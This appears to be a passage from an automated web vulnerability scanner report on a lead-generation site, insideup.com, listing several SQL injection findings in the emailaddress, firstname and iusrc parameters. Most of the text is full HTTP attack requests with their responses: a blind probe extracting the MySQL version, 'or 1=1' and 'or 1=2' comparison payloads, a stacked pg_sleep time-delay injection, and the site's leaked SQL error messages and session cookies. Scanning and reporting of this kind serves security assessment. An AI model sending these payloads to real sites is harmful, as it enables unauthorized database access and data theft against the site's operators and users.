The emailaddress parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the emailaddress parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email'&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:09:17 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=vddj30ek5074dqoq0gn7b86d50; path=/
Content-Length: 6942
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
buteId_508[]=3311__ Credit card processing&button3=Submit&companyname=Company Name&emailaddress=Email'&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80007&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&lastname=Last Name&phone=Phone&subcategoryId=80007&website=n/a&zip=Zip code' at line 5

Request 2

GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email''&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 02:09:18 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=86t5bh8184dctno66rvrm49fp7; path=/
Content-Length: 106
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/cace00/project.php was not found on this server.</p>

1.190. http://www.insideup.com/ppc/leadflow/cace00/project.php [firstname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/cace00/project.php

Issue detail

The firstname parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the firstname parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name'&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:09:22 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=e8erf21322vum4av9ophls3o76; path=/
Content-Length: 6942
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
buteId_508[]=3311__ Credit card processing&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name'&lastname=Last Name&phone=Phone&subcategoryId=80007&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&phone=Phone&subcategoryId=80007&website=n/a&zip=Zip code' OR prj.project_pa' at line 5

Request 2

GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name''&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 02:09:22 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=bl945dtqvre17l19r6mg33rk11; path=/
Content-Length: 106
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/cace00/project.php was not found on this server.</p>

1.191. http://www.insideup.com/ppc/leadflow/cace00/project.php [firstname parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.insideup.com
Path:   /ppc/leadflow/cace00/project.php

Issue detail

The firstname parameter appears to be vulnerable to SQL injection attacks. The payloads 48322919'%20or%201%3d1--%20 and 48322919'%20or%201%3d2--%20 were each submitted in the firstname parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name48322919'%20or%201%3d1--%20&lastname=Last+Name&phone=%27))%3BSELECT%20pg_sleep(25)--&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i38dgdf99msiunl575doegghj0; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 03:44:36 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47440


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...
<title> Compare Top Managed IP PBX Vendors, Use InsideUp to Get Quotes and Compare Top Providers of Managed VoIP Service </title>
   <meta name="description" content="Let Managed VoIP Providers Compete for Your PBX Needs. Compare Managed IP PBX Service from Leading Phone Solution Vendors "/>
   <meta name="keywords" content=" managed VoIP service, managed IP PBX, managed VoIP, managed PBX "/>
   <link rel="stylesheet" href="css/newlanding_style.css" />
   <link rel="stylesheet" href="style/dhtmlwindow.css" />
   <link rel="stylesheet" href="css/ui.core.css" />
   <link rel="stylesheet" href="css/Dyn_form_style.css" />
   <script type="text/javascript" src='js/jquery.js'></script>
   <script type="text/javascript" src="js/ui.core.js"></script>
   <script type="text/javascript">
   jQuery(document).ready(function() {
               jQuery("form").attr("autocomplete", "off");    
   });
       var global_form_attribute = 8    </script>
   
   <script language="javascript" src="js/dhtmlwindow.js"></script>
   <script language="javascript" src="js/modal.js"></script>
   <script type="text/javascript" src="js/application_js.js"></script>
   <link href="css/styles.css" rel="stylesheet" type="text/css" />
   <script>
       function frmprompt(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv', 'FAQs', 'width=399px,height=320px,left=285px,top=230px,resize=0,scrolling=0')
       }
       function frmprompt02(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv02', 'Why do we need this information?', 'width=399px,height=90px,left=150px,top=200px,center=1,resize=0,scrolling=0')
       }
   </script>
   <style>
   #step_1, #step_2, #step_3, #step_4, #step_5, #step_6, #step_7, #step_8, #step_9,    {
       font-size:12px;
       width:100%;
   }
   .blackback {
       background-color:#cccccc;
   }
   .whiteback {
       background-color:#ffffff;
   }
   </style>
</head>
<body>
<div id="Main_div_wrap">
   <div id="Main_Contant_Block">
       <div id="lending_headern">
       <table width="900" border="0" cellspacing="0" cellpadding="0">
       <tr
...[SNIP]...

Request 2

GET /ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name48322919'%20or%201%3d2--%20&lastname=Last+Name&phone=%27))%3BSELECT%20pg_sleep(25)--&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i38dgdf99msiunl575doegghj0; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 03:44:37 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52917


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...
<title> Inbound Call Center Service, Use InsideUp to Get Quotes and Compare Call Center Vendors. </title>
   <meta name="description" content="Let inbound call centers providers compete for your telemarketing needs. Compare call center services from leading inbound call center vendors."/>
   <meta name="keywords" content=" nbound call center solution, call center inbound service, inbound call center solutions, call center inbound, inbound call center, inbound call centers "/>
   <link rel="stylesheet" href="css/newlanding_style.css" />
   <link rel="stylesheet" href="style/dhtmlwindow.css" />
   <link rel="stylesheet" href="css/ui.core.css" />
   <link rel="stylesheet" href="css/Dyn_form_style.css" />
   <script type="text/javascript" src='js/jquery.js'></script>
   <script type="text/javascript" src="js/ui.core.js"></script>
   <script type="text/javascript">
   jQuery(document).ready(function() {
               jQuery("form").attr("autocomplete", "off");    
   });
       var global_form_attribute = 10    </script>
   
   <script language="javascript" src="js/dhtmlwindow.js"></script>
   <script language="javascript" src="js/modal.js"></script>
   <script type="text/javascript" src="js/application_js.js"></script>
   <link href="css/styles.css" rel="stylesheet" type="text/css" />
   <script>
       function frmprompt(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv', 'FAQs', 'width=399px,height=320px,left=285px,top=230px,resize=0,scrolling=0')
       }
       function frmprompt02(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv02', 'Why do we need this information?', 'width=399px,height=90px,left=150px,top=200px,center=1,resize=0,scrolling=0')
       }
   </script>
   <style>
   #step_1, #step_2, #step_3, #step_4, #step_5, #step_6, #step_7, #step_8, #step_9, #step_10, #step_11,    {
       font-size:12px;
       width:100%;
   }
   .blackback {
       background-color:#cccccc;
   }
   .whiteback {
       background-color:#ffffff;
   }
   </style>
</head>
<body>
<div id="Main_div_wrap">
   <div id="Main_Contant_Blo
...[SNIP]...

1.192. http://www.insideup.com/ppc/leadflow/cace00/project.php [iusrc parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.insideup.com
Path:   /ppc/leadflow/cace00/project.php

Issue detail

The iusrc parameter appears to be vulnerable to SQL injection attacks. The payloads 16250414'%20or%201%3d1--%20 and 16250414'%20or%201%3d2--%20 were each submitted in the iusrc parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc16250414'%20or%201%3d1--%20&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=%27))%3BSELECT%20pg_sleep(25)--&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i38dgdf99msiunl575doegghj0; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 03:35:58 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47459


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...
<title> Compare Top Managed IP PBX Vendors, Use InsideUp to Get Quotes and Compare Top Providers of Managed VoIP Service </title>
   <meta name="description" content="Let Managed VoIP Providers Compete for Your PBX Needs. Compare Managed IP PBX Service from Leading Phone Solution Vendors "/>
   <meta name="keywords" content=" managed VoIP service, managed IP PBX, managed VoIP, managed PBX "/>
   <link rel="stylesheet" href="css/newlanding_style.css" />
   <link rel="stylesheet" href="style/dhtmlwindow.css" />
   <link rel="stylesheet" href="css/ui.core.css" />
   <link rel="stylesheet" href="css/Dyn_form_style.css" />
   <script type="text/javascript" src='js/jquery.js'></script>
   <script type="text/javascript" src="js/ui.core.js"></script>
   <script type="text/javascript">
   jQuery(document).ready(function() {
               jQuery("form").attr("autocomplete", "off");    
   });
       var global_form_attribute = 8    </script>
   
   <script language="javascript" src="js/dhtmlwindow.js"></script>
   <script language="javascript" src="js/modal.js"></script>
   <script type="text/javascript" src="js/application_js.js"></script>
   <link href="css/styles.css" rel="stylesheet" type="text/css" />
   <script>
       function frmprompt(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv', 'FAQs', 'width=399px,height=320px,left=285px,top=230px,resize=0,scrolling=0')
       }
       function frmprompt02(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv02', 'Why do we need this information?', 'width=399px,height=90px,left=150px,top=200px,center=1,resize=0,scrolling=0')
       }
   </script>
   <style>
   #step_1, #step_2, #step_3, #step_4, #step_5, #step_6, #step_7, #step_8, #step_9,    {
       font-size:12px;
       width:100%;
   }
   .blackback {
       background-color:#cccccc;
   }
   .whiteback {
       background-color:#ffffff;
   }
   </style>
</head>
<body>
<div id="Main_div_wrap">
   <div id="Main_Contant_Block">
       <div id="lending_headern">
       <table width="900" border="0" cellspacing="0" cellpadding="0">
       <tr
...[SNIP]...

Request 2

GET /ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc16250414'%20or%201%3d2--%20&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=%27))%3BSELECT%20pg_sleep(25)--&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i38dgdf99msiunl575doegghj0; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 03:37:40 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52936


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...
<title> Inbound Call Center Service, Use InsideUp to Get Quotes and Compare Call Center Vendors. </title>
   <meta name="description" content="Let inbound call centers providers compete for your telemarketing needs. Compare call center services from leading inbound call center vendors."/>
   <meta name="keywords" content=" nbound call center solution, call center inbound service, inbound call center solutions, call center inbound, inbound call center, inbound call centers "/>
   <link rel="stylesheet" href="css/newlanding_style.css" />
   <link rel="stylesheet" href="style/dhtmlwindow.css" />
   <link rel="stylesheet" href="css/ui.core.css" />
   <link rel="stylesheet" href="css/Dyn_form_style.css" />
   <script type="text/javascript" src='js/jquery.js'></script>
   <script type="text/javascript" src="js/ui.core.js"></script>
   <script type="text/javascript">
   jQuery(document).ready(function() {
               jQuery("form").attr("autocomplete", "off");    
   });
       var global_form_attribute = 10    </script>
   
   <script language="javascript" src="js/dhtmlwindow.js"></script>
   <script language="javascript" src="js/modal.js"></script>
   <script type="text/javascript" src="js/application_js.js"></script>
   <link href="css/styles.css" rel="stylesheet" type="text/css" />
   <script>
       function frmprompt(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv', 'FAQs', 'width=399px,height=320px,left=285px,top=230px,resize=0,scrolling=0')
       }
       function frmprompt02(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv02', 'Why do we need this information?', 'width=399px,height=90px,left=150px,top=200px,center=1,resize=0,scrolling=0')
       }
   </script>
   <style>
   #step_1, #step_2, #step_3, #step_4, #step_5, #step_6, #step_7, #step_8, #step_9, #step_10, #step_11,    {
       font-size:12px;
       width:100%;
   }
   .blackback {
       background-color:#cccccc;
   }
   .whiteback {
       background-color:#ffffff;
   }
   </style>
</head>
<body>
<div id="Main_div_wrap">
   <div id="Main_Contant_Blo
...[SNIP]...

